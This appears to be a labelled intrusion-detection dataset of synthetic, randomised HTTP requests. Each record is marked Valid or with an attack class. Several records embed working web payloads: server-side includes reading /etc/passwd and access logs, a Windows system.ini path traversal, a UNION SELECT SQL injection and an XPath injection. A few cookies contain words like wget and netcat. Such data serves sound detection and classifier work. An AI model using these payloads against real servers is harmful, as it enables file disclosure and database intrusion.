UA-OS: Solaris
UA-Color: color32
UA-Pixels: 265x4245
Via: drz2/7.7 57.47.155.203, arnn4l/0.4 www.zehs0Us.gif
Transfer-Encoding: gzip
Upgrade: zjyco/2.1, aimb/3.0
Warning: 570 www.ilst.tiff "wuni9is1t9" 
X-Forwarded-For: 87.119.214.253
X-Serial-Number: 776657072780
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10693
Start - Id: 39624
class: SSI
GET /ss/so.cgi?z8mstohb=%3C%21--+++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E HTTP/1.1
Host: www.ntequsepm.net
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: compress;q=0.8, gzip, identity
Accept-Language: *;q=0.9
Cache-Control: min-fresh=89
Client-ip: 79.170.36.207
Cookie: 6A@Is5gYVvari0=dx@WsS6VeE;0a4lZzGk=gaDo;OlSNobjectd=17320431;avl=oa<7;toata=ens a]jiscripthHporewiafdocument
Cookie2: $Version="78"
Date: Wed, 04 Jan 06 06:14:57 UTC
ETag: "JNM4muUx1V.zdKmp.HOl"
Expect: fTEanr
From: nneTpp@ds2o4khd.org
If-Modified-Since: Sat, 10 Nov 07 21:06:16 CET
If-Unmodified-Since: Wed, 06 Aug 08 05:59:41 UTC
If-Match: "m.DST8zmVmUW-Zbivvl"
If-None-Match: "7_B9IoI8RT._5O8IHd3"
If-Range: "1tBDwK1AmirrXI9L"
Max-Forwards: 72
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest nc=2CEcd91a
Authorization: eaiie 8oiF=aChthh
Range: 973-,-4,32221-
Referer: http://www.3Snt1.it/anlyia2q/Ee4ul/tyEUo/ozmeas/w8tye.swf
TE: trailers,gzip
Trailer: Accept-Language
User-Agent: aorlsenliaarh
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: 7.3 80.176.58.194
Transfer-Encoding: oraN
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 475 125.51.35.41 "LSrhe" 
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 661984692472
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39624
Start - Id: 9221
class: Valid
GET /u3LPAh/rYTjC4_2cBqzlb/iHrzba.msf? HTTP/1.1
Host: www.Adnd.ch
Connection: keep-alive
Accept: text/*;q=0.8, video/quicktime;q=0.1
Accept-Charset: x-mac-japanese;q=0.2, cp-936;q=0.3
Accept-Encoding: gzip, compress, deflate;q=0.2
Accept-Language: nd-ADnP1rt;q=0.0
Cache-Control: min-fresh=834
Client-ip: 41.124.188.39
Cookie: ete7e=4360546;qsoe4wf=MI
Cookie2: $Version="295"
Date: Sat, 20 Dec 08 20:18:40 GMT
ETag: W/"QtlGuC1KRjTq9PBXyrT"
Expect: betAnlx
From: iaas@rehmnIi9s.uk
If-Modified-Since: Sun, 15 Jun 08 17:17:57 CET
If-Unmodified-Since: Thu, 16 Mar 06 21:40:59 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 044
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM dHVhcHgxeWkzZXN0dVR0YWoxcnVvd3hybk5yb1RubmhzVHVlaG9vZUU=
Authorization: Digest response="A5264BaaA61E753dfC11acD0e3bfA93f"
Range: 7-,506-547400,2408-38770
Referer: /irat/r8e2eJnE.dll
TE: gzip;q=0.9
Trailer: If-Match
User-Agent: Mozilla/7.4 (compatible; Konqueror/0.3; Open BSD i386; ui1alsgt; qon7ts; wqnle)
UA-CPU: Sparc
UA-Disp: 5248,9403,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 113x871
Via: 0.1 www.8eto.gif:45042
Transfer-Encoding: mdsi; wxcdeo=5itnet
Upgrade: 1pru/5.1
Warning: 386 22.153.125.167 "t5eh" "Thu, 23 Jun 05 10:04:46 GMT"
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 6194472934474
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 9221
Start - Id: 49629
class: XPathInjection
GET /o8Af5K/an/tchvro/ty/cG0ZztcEPiIj/rVQuxUjtH/efvnizxel0s/do3mnbaw13/zT.Ti.A%uGjs2/TEa6mdgpSY25id/bBCAEyj.php4?eyb=58662&dyQ6Gz5divnq=752&d1deteiy=2&Vnph-Xe=74737+++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+1761%3D HTTP/1.1
Host: www.tota.de:80
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312, windows-1251, x-mac-cyrillic, euc-jp
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 72.69.9.83
Cookie: eaahSiegni= eLbe8
Cookie2: $Version="34"
Date: Tue, 04 Mar 08 13:43:57 CET
ETag: "d_atRBP91QL9mPSF61cb"
Expect: 100-continue
From: nUasei3i@d2es4pty6e.biz
If-Modified-Since: Fri, 13 Apr 07 14:00:27 UTC
If-Unmodified-Since: Wed, 26 Nov 08 16:35:31 CET
If-Match: "ht7p-6lBnvt3Ffw66o3c"
If-None-Match: "9I-KN992UTWIsHB0t"
If-Range: *
Max-Forwards: 900
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: Basic Y0hldm96QTo5ZWVlZVRlcw==
Range: 31-025167,936-84
Referer: /eAei/nnabeuve/NistOth/ER7eI1.dll
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: ihia/3.5.1
UA-CPU: StrongARM
UA-Disp: 1996,6305,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: sLtnu/0.5 182.7.52.205, HTTP/8.3 www.tut1.jpg
Transfer-Encoding: deflate
Upgrade: hZair/3.0, n6coi/9.2, gii/4.7
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49629
Start - Id: 1731
class: Valid
GET /iMiz2WlD/eS/m9-M5qB/2TA/nY_KwQe/e74ELKXneMDk0J/eLdv/2Smlase4.nsf? HTTP/1.1
Host: 28.154.165.125
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-korean;q=0.2, euc-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 109.240.50.123
Cookie: ag=6vans;fWesSee=ttkzdropaNtfs=du;ihadtincli=0080333;rNsraeio9ntd=1;TiOTei6uon8tadi=bHzg4Yq2
Cookie2: $Version="377"
Date: Fri, 20 Jul 07 05:19:34 GMT
ETag: W/"L7f1sN7yyH1pr8.R"
Expect: 100-continue
From: ylmul@hfldTeee2.org
If-Modified-Since: Mon, 20 Mar 06 17:37:12 GMT
If-Unmodified-Since: Fri, 09 Sep 05 19:08:48 CET
If-Match: "ITjjDhHGj6ERyD5JiS"
If-None-Match: *
If-Range: "no3mVB912JgJeZfrdk"
Max-Forwards: 4269
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: eahnhs rr6D=telemrl
Authorization: sdsDse tRVeaaf=Wrheen
Range: -37,450406-
Referer: http://aurca6rE.cz/6hf8au/etvg0shm/jTaq/bzerz/k3rr.asp
TE: deflate;q=0.1,deflate
Trailer: If-Match
User-Agent: Mozilla/8.0 (Machintosh; U; PPC Mac OS X 2.2; ll-se; rv:1.7.6) Gecko/02015549
UA-CPU: PowerPC
UA-Disp: 6638,4343,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6206x0801
Via: hnh/3.6 www.tasd.jpg, 3.6 www.lzreCyl.js
Transfer-Encoding: identity
Upgrade: ejodco/1.2, nnhlf/2.2, sht/7.3, 6nmn/0.5, neetes/1.7
Warning: 145 www.Iehgiho.html "wrbmde7w6d7Oeekrmc" 
X-Forwarded-For: 102.24.89.42
X-Serial-Number: 455016477
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1731
Start - Id: 25808
class: Valid
GET /tz/rcb/njNurH0S.php4? HTTP/1.0
Host: 218.109.26.169
Connection: nhsawt
Accept: */*;q=0.5
Accept-Charset: big5, x-mac-japanese;q=0.9
Accept-Encoding: compress, compress, deflate
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 39.24.186.85
Cookie: x@zAy=8834922;iuExon=3454;ce3tjH=4rnme;emseusomita=uop;pYi_Q3p=eeougrsn<
Cookie2: $Version="8"
Date: Sun, 04 Sep 05 07:00:15 GMT
ETag: W/"5KAobwbWehhET_36a16V"
Expect: hilldtgm=yhYaRiZ
From: rEiy@reqTe7sdhm.cz
If-Modified-Since: Sat, 04 Oct 08 16:19:59 GMT
If-Unmodified-Since: Sun, 30 Sep 07 16:51:47 GMT
If-Match: "j.obEAHfqHXtF48_Rd"
If-None-Match: "8u9yFiIBHP87Yij3ofmC"
If-Range: Wed, 31 Jan 07 04:07:46 GMT
Max-Forwards: 6846
MIME-Version: 6.3
Pragma: reiet='e'
Proxy-Authorization: Basic aG8zYXJPYjplaHV4bw==
Authorization: Digest username="tb4ttt"
Range: 644-,-02
Referer: /dtmqa/zgsdsSte.asmx
TE: gzip;q=0.7,trailers
Trailer: Range
User-Agent: Mozilla/0.6 (compatible; MSIE 4.1; Linux i386; lemS7; vhi7en; rect)
UA-CPU: PowerPC
UA-Disp: 7806,6470,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 291x574
Via: 4.4 168.255.101.223
Transfer-Encoding: identity
Upgrade: wga/3.1, Wienee/8.7, tle/0.5, sc5O3p/8.0, atnnea/5.9
Warning: 886 145.152.248.154 "h6n7sqlaahdlAhre0" 
X-Forwarded-For: 186.228.205.221
X-Serial-Number: 5771791492061
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25808
Start - Id: 2923
class: Valid
GET /sdq4O1PpXgTmR4olQ3N/mNdw-@fbxy3d/wxetefnn/9J8G8ro/sxDze99lb9C7NgTH2k/n_SANr5sJ9/56varj.doptcp4R/atz6m/mk/hWYeY78TDP97TSwu/e0hem7ot2ludn.aspx?4oenezVv=0lmao+-q&SSPUCNmailpk=7894475&Atg=%3Ft%3Ani%5Bq%25ulob%40qt&rhoitE=bc&Gs2_0d=agL_W&tshossvt=ekbAorynoftesKdsu&D3sVu7p=ej0echoi&anYb=i+ HTTP/1.1
Host: www.touihac1.cz:80
Connection: teh0e
Accept: video/*;q=0.4, application/*, image/png
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, deflate;q=0.9
Accept-Language: i-ht9tpc;q=0.2, xt-y5rctt
Cache-Control: min-fresh=5
Client-ip: 97.237.242.178
Cookie: shIPyt=a;usrqYusrRhBI=c;ebmesanmec6aa=ocfh0vo;sgOE=7096;eta3ojyamre=75231945;.orOA=e3  
Cookie2: $Version="500"
Date: Sat, 28 Nov 09 11:29:28 GMT
ETag: "NYIx.zUUhySESjCSVLgJ"
Expect: ySha9
From: qg1rhg@3iIi.de
If-Modified-Since: Wed, 14 Jan 09 03:44:27 GMT
If-Unmodified-Since: Fri, 10 Apr 09 22:32:35 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1475
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rieTn
Authorization: aopV maTt=ouwD
Range: 8-0812,200838-406
Referer: http://tmlH.com/zwi4nrom/rc3irl.asmx
TE: gzip;q=0.4,trailers
Trailer: Trailer
User-Agent: eHptrtrf
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 202x8189
Via: 9.3 www.ueme4ada.htm, 1.6 98.125.214.7
Transfer-Encoding: gzip
Upgrade: aqeAe/2.5, uaisaa/2.3
Warning: 530 www.zisn.js "a3sxuae" "Sun, 09 Jul 06 13:08:32 GMT"
X-Forwarded-For: 138.229.146.224
X-Serial-Number: 369098757505343425
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2923
Start - Id: 3442
class: Valid
GET /n6HLc9DL/ml@BN33lW/Aspocds/in2@ftpeboot.iniVBKOTT6U/hianm/o0nes/stylesVHQOtelnet/acgdre/ykTDlA96wg/mga71UylIm.M/wnWT/ic.tiff?oo7ut6mahg=xmefna%3Fotn&hserczmunk=am&0tutdsenieyote=lsn6%7E&htigor0pC=177623&l4s=443063&praMuftsh1r=n3nsdBr&hw=715098&e6h=28&xKselectIO@AeWxK=oxB1KGB7nezr&xit0fromtmpS6WvB=3 HTTP/1.1
Host: www.lhigma1.gov:80
Connection: close
Accept: video/quicktime;q=0.9, audio/*;q=0.6, application/zip;q=0.1
Accept-Charset: euc-jp, windows-1252;q=0.3, macintosh, euc-jp
Accept-Encoding: *
Accept-Language: Trs-atEtm, dGys6dci-3Eoefe, nosF-fraNncje;q=0.0, si-nHo;q=0.4, uesofu-pijsva
Cache-Control: max-stale
Client-ip: 173.83.171.113
Cookie: gt8tDanmss=in_eBrm8;a2ykeh4ydoets=3;RruimuoelttxSi=e\o
Cookie2: $Version="90"
Date: Sun, 15 Nov 09 17:32:20 GMT
ETag: "dC92dobgdll_ZmV"
Expect: lriuAx3=gltbi
From: otEj@3satd.de
If-Modified-Since: Wed, 13 Jul 05 14:02:42 UTC
If-Unmodified-Since: Sat, 16 Aug 08 11:57:47 GMT
If-Match: "dR-jdKLA28M8g.X7or"
If-None-Match: *
If-Range: "k0TnObcZBJ81AMZdNt"
Max-Forwards: 2467
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: r5le hmnr=ywltxE
Authorization: oitRr5 fiwdrL2=HpdIi
Range: -13935,-8
Referer: http://erd9no.ch/AzId9dj/tdTeiAty/yoie/Dxet.exe
TE: deflate;q=0.3
Trailer: Date
User-Agent: Mozilla/7.0 (Machintosh; U; PPC Mac OS X 2.1; gt-nr; rv:3.4.9) Gecko/75106106
UA-CPU: MIPS
UA-Disp: 426,091,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x7653
Via: FTP/3.4 110.66.153.44
Transfer-Encoding: compress
Upgrade: he2aGa/7.2, t4cmu/0.8
Warning: 213 www.rtzhsc.html:27282 "rclUafnImremR8er2Srt" "Mon, 19 Jul 04 07:37:36 CET"
X-Forwarded-For: 118.211.6.212
X-Serial-Number: 80963840971
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3442
Start - Id: 32679
class: Valid
PUT /lZHRyhfe/aEDhclMkr8C1mwAfCoA/sq.D8-/dW3xvZT.q/arZxILWb/cap/dAKfks/c6dasnialx/aSrUa.u/eenicSoiewdeieetsonc/eiYf-kvolQHApsQqthNY/o77n15peasnbar.gif? HTTP/1.0
Content-Length: 81
Content-Language: uAO8,Tpta9b
Content-Encoding: compress
Content-Location: http://www.AyRshmh.biz/flqciXh/rrou.bin
Content-MD5: M2d3dGFpZWF0eWVjbDFvcA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Sep 05 14:52:31 CET
Last-Modified: Wed, 27 Sep 06 21:21:28 CET
Host: www.uafn4a.com
Connection: close
Accept: audio/*, text/plain;q=0.6
Accept-Charset: iso-10646-ucs-2, iso-8859-6;q=0.6, windows-1250, windows-1250;q=0.6, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 13.160.97.239
Cookie: no=2ieonrmn;ioob9mete=hfisg;cihmansfeN=tY9ztlTKqT
Cookie2: $Version="97"
Date: Wed, 23 Jun 04 20:06:23 CET
ETag: "vt6d70iKLf82XTBl7wPQ"
Expect: olnle
From: lhr7mem@aapi.biz
If-Modified-Since: Wed, 07 Apr 04 13:25:25 GMT
If-Unmodified-Since: Tue, 09 Dec 08 15:16:09 CET
If-Match: *
If-None-Match: *
If-Range: "RyUjQ-7ZgrYK@Lo"
Max-Forwards: 03
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: otpget 3eshi=egfrwls
Authorization: Basic YWlyZTdtbjpyZThlcnNl
Range: 305943-294113,0-,-7372
Referer: /nuod/nojri/snalao1n.sh
TE: trailers,trailers,deflate
Trailer: TE
User-Agent: lKjnZm0 http://www.uneEh.gov
UA-CPU: PowerPC
UA-Disp: 6556,232,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 853x924
Via: 6.3 184.149.74.202, 2.6 209.217.205.187, HTTP/3.6 www.utizcob.css
Transfer-Encoding: deflate
Upgrade: ercu/0.8, 0hiEfa/9.7, iMd25D/0.0
Warning: 342 126.45.250.195:34 "QMtcI9" "Fri, 30 Oct 09 22:39:38 UTC"
X-Forwarded-For: 130.40.193.83
X-Serial-Number: 7602506068987
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aatt6nbesdsen=lqEpfco&insay=r&dSateanerdpssa=eK73UTV&4pxtYDxiframey_Ha=Cid5i7liOf

End - Id: 32679
Start - Id: 25321
class: Valid
GET /oWWDIXnA/yKrrIgrr67sgtfRiao.tiff?j_LWN1=a.TGQehI5AE&wn0=46&QRZDKx.UzS=stzDpWneDceyv&frto=esR%2BytnhH&0rstr=t8Escnt&J.xK=tsd+%27binSPhtmp%25leep&ureyn=ee+%28&Ctzeb=gemsOFgtle&sie=57&Arecwed3lEEdb=fs%25aCtih+&eie=pv-X&auieiMrwnFfA=9807399&5lnfcieta=600226 HTTP/1.0
Host: 186.141.76.49
Connection: close
Accept: audio/*;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: rNxo-3e, nauaPcr-otyhl
Cache-Control: only-if-cached
Client-ip: 138.15.134.213
Cookie: asdiljefsoos=bH6Y_5J;null8hmf=ndr61es58sstDncny
Cookie2: $Version="647"
Date: Tue, 21 Dec 04 11:40:15 GMT
ETag: "3Ax5VcM89xogUtWtM"
Expect: 100-continue
From: leIud@iDtnesp.ch
If-Modified-Since: Fri, 22 Apr 05 21:06:13 GMT
If-Unmodified-Since: Sat, 10 Jun 06 24:24:13 CET
If-Match: "jBTMNoFnOx5iFBJFS@yH"
If-None-Match: "4RM7wF4t8_fb.Z.z-"
If-Range: *
Max-Forwards: 3
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: 80n2 uen6ns=rteA
Authorization: Digest nonce
Range: -5,9601-,-779
Referer: /woits/npdueeea/ireyn/ihn69u3e.sh
TE: gzip,trailers,chunked;q=0.8
Trailer: Accept-Language
User-Agent: Mozilla/5.9 (Windows; U; WinNT 5.7; 7a-rA; rv:2.0.3) Gecko/20198489
UA-CPU: 68000
UA-Disp: 645,174,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1204x4016
Via: FTP/7.8 www.bjit.gif:336
Transfer-Encoding: gzip
Upgrade: taeh/4.7
Warning: 791 www.syt5.png "llEhywSTamsu" 
X-Forwarded-For: 80.80.131.136
X-Serial-Number: 8816799140525105840
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25321
Start - Id: 45307
class: PathTransversal
GET /ata/ptathhysTisghThre.css?ybqw=0&ckLU=e9&rbteRa=2oO&aEpaxtMso=ecopy7&telnao1s0mt=0196443272&n1ged=fJDfl&vauQsonecbtv5ej=rboot.iniFtt&oosmlOE9TamK=62941415 HTTP/1.0
Host: www.ueeik.fr:80
Connection: close
Accept: video/*;q=0.2, text/xml;q=0.0
Accept-Charset: x-mac-chinesesimp, x-mac-ce, gb2312;q=0.0
Accept-Encoding: 
Accept-Language: 3e-Th1ow, tC6scel-sxsi, haWion-n;q=0.5
Client-ip: 149.238.74.231
Cookie: iq=y ltt;ZPZincludeA=rSr 4-on6 formiMt'tidwget;8trddtsUtecRei=nbinlgsR8&eea8nh;group byAC-cCQ=cwkSXf_Xxk9J;6dle17talh=..\..\..\..\..\..\WINDOWS\system.ini
Date: Tue, 27 Nov 07 13:04:06 GMT
If-Match: "XsPVET9y4pZvyFSm"
If-None-Match: *
Max-Forwards: 3
Pragma: no-cache
Authorization: NTLM MzJIdU80ZGlzc3AyaXRodG1lZXVoZWZzd2VlaTZhMmxiOWhocmVpcnFlYXJibm8=
Referer: /ins5.conf
TE: gzip;q=0.1,trailers
User-Agent: Mozilla/3.9 (compatible; Konqueror/1.9; Win 9x; ho4tn; 5kaotant; mnePgsdev)
UA-CPU: MIPS
Via: ilg/5.0 www.tncoxT.htm, 7.0 www.f9tHhac.shtml, 5.9 www.f7epwsya.jpg
Transfer-Encoding: compress

null

End - Id: 45307
Start - Id: 17047
class: Valid
GET /gtlmu4foflr/sbdW/ezyD/se/scud1J93.oeZ9NE5D./c1T42Z/twlriErtydpe/gEugaTiNHrerenr.mspx?loIgs2ehi=i9tyFKiWM&iantnoniott=eJw8S6&xIconnectpositionq6O3ftpKq@=rtyconnecte&S.AOC=0qqXe4EOOk&Ka5elofr=5190 HTTP/1.1
Host: www.tlnztd.cz
Connection: close
Accept: audio/x-wav;q=0.9, video/mpeg;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: gzip;q=0.4, compress, identity
Accept-Language: Aoatnldg-g6rat;q=0.5, nndorShe-tRcl, ade7sc-eed3aI;q=0.3
Cache-Control: only-if-cached
Client-ip: 84.206.171.85
Cookie: opqn0gFaape=yelehri;e6dmookaen1irtt=65;0llbsma4sdc=passthruahe'oc netcat;apiolilwKehi=talhsstvtw2sam;tdeiaycieHtnu=0
Cookie2: $Version="838"
Date: Sat, 22 Mar 08 11:37:51 GMT
ETag: "XVirKRXTRc9TqArHzb1h"
Expect: 100-continue
From: mbgys@xehcas.biz
If-Modified-Since: Wed, 14 Jan 09 09:24:52 GMT
If-Unmodified-Since: Sun, 10 Jan 10 03:13:49 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 12 Jan 09 01:55:59 CET
Max-Forwards: 1
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRt4Eq"
Authorization: Basic dDdocnRVOjFodWFzaHJh
Range: -8,76-,81611-3201
Referer: /waamfIrt/ooor/hooi/verotdet/Lewor0i.gif
TE: trailers
Trailer: Warning
User-Agent: Mozilla/6.7 (compatible; MSIE 7.4; Win 9x; eay5drcoan; wtnett)
UA-CPU: PowerPC
UA-Disp: 7236,439,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 3768x758
Via: 0.0 165.243.57.70, 2.1 www.aeblwt.html
Transfer-Encoding: deflate
Upgrade: oiae/2.0, 2ohaei/3.7, Kead/8.1, tb5ex/6.1, hOAqi/1.3
Warning: 081 www.awrh.css "tsmF4p" "Sat, 07 Feb 09 11:32:07 GMT"
X-Forwarded-For: 146.223.240.130
X-Serial-Number: 88882390422538145
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17047
Start - Id: 11798
class: Valid
GET /aehletn/bdsepli/vtYsaArNmdSEEwn/aoen/fCTMocoy2DFUG/todannxhsiolmns4cr/57JfrzGljTVO9/aVBp5PSGxh3XRDxFzL/fmTAM@7F..vC0Ow.pl?rel=detce&tim9edx=reh&sem9nolen=75&o1eaea=ct0booocwlet6IrsEd&enqfpds=6QIpNiTxXTwr&NM3q=oa+ HTTP/1.0
Host: www.oNedtdq.biz:20
Connection: aoLgsoe
Accept: */*;q=0.6
Accept-Charset: x-mac-turkish;q=0.3, windows-1258, iso-8859-8-i;q=0.7
Accept-Encoding: 
Accept-Language: 7-Ess
Cache-Control: no-transform
Client-ip: 199.123.97.198
Cookie: lfesmn=Aste
Cookie2: $Version="32"
Date: Wed, 13 Apr 05 18:19:28 UTC
ETag: "-b2jY7SXJLf5rJ4p"
Expect: 100-continue
From: tnsjx@nvlaoadtiu.st
If-Modified-Since: Fri, 23 Jul 04 10:47:11 GMT
If-Unmodified-Since: Thu, 29 Jan 04 14:39:20 GMT
If-Match: "7Bt1Q3ZTEc9q3oozMR"
If-None-Match: *
If-Range: Tue, 12 Jul 05 08:14:27 CET
Max-Forwards: 42
MIME-Version: 0.0
Pragma: pa=bn
Proxy-Authorization: otomt nIsr=ikrotu
Authorization: Extm lith=n4ehewc2
Range: 0942-
Referer: /nano/leebat.cgi
TE: chunked;q=0.9,chunked;q=0.0
Trailer: Accept-Charset
User-Agent: atVVdhRji8bom7VtfdXs
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0954x9922
Via: 58ainh/7.2 www.rdegts.shtml, HTTP/1.6 43.244.229.37
Transfer-Encoding: gzip
Upgrade: meE/0.7
Warning: 010 93.171.200.42 "zs5dwspM1loAab" 
X-Forwarded-For: 92.235.100.67
X-Serial-Number: 18749
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11798
Start - Id: 41607
class: SqlInjection
GET /KC@0gELUmLechoKP@7/uUcHB7h042jnTRok_88u/@A6execrboot.iniY6o2/ahPdP0kVFsfgzs/e6dQ/tmlteUNlhefty/oEXll1SSH/mGT64M/d3rI9tttms.php?1e=%27++++%29+UNION+ALL+SELECT++2++++FROM++sit4++WHERE+%28%27%27+++%3D+%27&tueehwaMhlyt5x4=0658&taioa=cdluAtfzerecedw HTTP/1.0
Host: 184.43.85.228
Connection: close
Accept: text/*;q=0.3, image/*;q=0.6
Accept-Charset: windows-1253;q=0.2, koi8
Accept-Encoding: compress
Accept-Language: ehgo-uets, erni-n, t-g7daakn;q=0.4
Cache-Control: min-fresh=72927
Client-ip: 66.83.180.190
Cookie: Owhdm=99648358
Cookie2: $Version="7"
Date: Tue, 03 Apr 07 14:20:45 GMT
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: 100-continue
From: tcssd@oays6you.com
If-Modified-Since: Mon, 29 Jun 09 04:44:06 GMT
If-Unmodified-Since: Fri, 27 May 05 21:05:27 UTC
If-Match: "GLj31RWXyy@wOqMjY"
If-None-Match: "bpJ1DJgr9tkdPe5oy3"
If-Range: "U_yPt@IBIvFgpvR"
Max-Forwards: 6
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: mntre es5jmh0t=sta8dmeb
Authorization: Digest uri=/sfbsoi.exe
Range: -827608,0-149272
Referer: http://www.dnon.biz/4eIztdt/smHanae/p0iqln/diecer.tar
TE: trailers,trailers,deflate;q=0.7
Trailer: Referer
User-Agent: 4ts83 (oKfk-PhKx; lwmLn2)
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 1.5 www.ilmoha.js, HTTP/6.9 120.77.115.214, ocrh1i/5.1 www.ymunfy.gif
Transfer-Encoding: eirRsr; Aetn=dlapJ63e
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 846 125.8.137.130 "rhch5ohdnsoyi" "Mon, 08 Dec 08 08:13:31 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41607
Start - Id: 39576
class: SSI
PUT /digm/jinc.I86P/mC.WwlSsP4/ctyuc3k9p6w/is0Yoalssvpnh7lojhh/Dh7perlFCQ3/tj-p1Rf/n8rethaapllkt.php4? HTTP/1.0
Content-Length: 198
Content-Language: olEjl,b
Content-Encoding: deflate
Content-Location: http://seso.biz/lzee3g5/lreimlI/pqon.wmn
Content-MD5: b2FzZ2RhcmVDODRmZXNsdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Aug 07 20:04:36 GMT
Last-Modified: Thu, 27 Apr 06 07:09:36 UTC
Host: www.xhysEs.gov:80
Connection: close
Accept: video/mpeg;q=0.1
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.9, compress;q=0.9, deflate, gzip, gzip;q=0.0
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 145.102.168.110
Cookie: 7aFe=335828
Date: Tue, 20 Apr 10 11:52:40 CET
ETag: "E-DjyT8l5_1VDtzNt-o"
Expect: chkksn
If-Modified-Since: Sat, 30 Jun 07 04:17:02 UTC
If-Unmodified-Since: Tue, 29 Mar 05 16:38:12 GMT
If-Match: "60iTwuKyZWjIevA"
If-None-Match: *
Max-Forwards: 739
Pragma: d='eusaloe8'
Authorization: Reljfx nl9eyui=eqo4nkko
Referer: http://eAti.cz/Eeeao/ronis/9tntmh/4ee0eyn.jsp
TE: trailers,gzip;q=0.4
User-Agent: Mozilla/3.2 (Machintosh; U; Mac OS X 0.8; hs-rw; rv:3.8.9) Gecko/41272264
UA-CPU: x86
Via: 1.4 147.201.129.5, 6.7 42.203.74.130, FTP/6.8 www.coGgsodh.htm
Transfer-Encoding: compress
----: -------------------------------------------------

ltrrirt=snst&llzAerd=<!--    #include    virtual="/etc/passwd"   -->&Lwne6rbrnchR=9042&hastto0eeo=dTWTAgu4ZOrk&rn6nbaeeaMtiRD=6%bri&7V5VQxhBmailw=eihd6mO&ag=993883586&etFOetsnD=5

End - Id: 39576
Start - Id: 32846
class: Valid
